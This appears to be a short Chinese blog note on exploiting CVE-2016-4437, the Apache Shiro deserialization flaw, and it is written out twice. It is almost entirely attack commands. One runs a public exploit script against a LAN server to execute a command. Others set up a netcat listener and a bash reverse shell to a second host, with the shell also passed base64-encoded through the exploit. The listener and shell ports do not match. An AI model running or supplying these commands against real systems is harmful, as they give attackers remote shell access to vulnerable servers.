# CVE-2016-4437 Shiro反序列化漏洞
==POC==
https://github.com/insightglacier/Shiro_exploit
python3 shiro_exploit.py -t 3 -u http://192.168.2.147:8080 -p "touch a.txt"
==Getshell==
nc -lvp 666
bash -i >& /dev/tcp/192.168.2.130/6666 0>&1 bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTMwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}
python3 shiro_exploit.py -t 3 -u http://192.168.2.147:8080 -p "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTMwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}"
==POC==
https://github.com/insightglacier/Shiro_exploit
python3 shiro_exploit.py -t 3 -u http://192.168.2.147:8080 -p "touch a.txt"
命令執行成功。
==Getshell==
監聽機器執行以下命令:
nc -lvp 666
受害機器執行以下命令:
bash -i >& /dev/tcp/192.168.2.130/6666 0>&1 bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTMwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}
python3 shiro_exploit.py -t 3 -u http://192.168.2.147:8080 -p "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTMwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}"
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容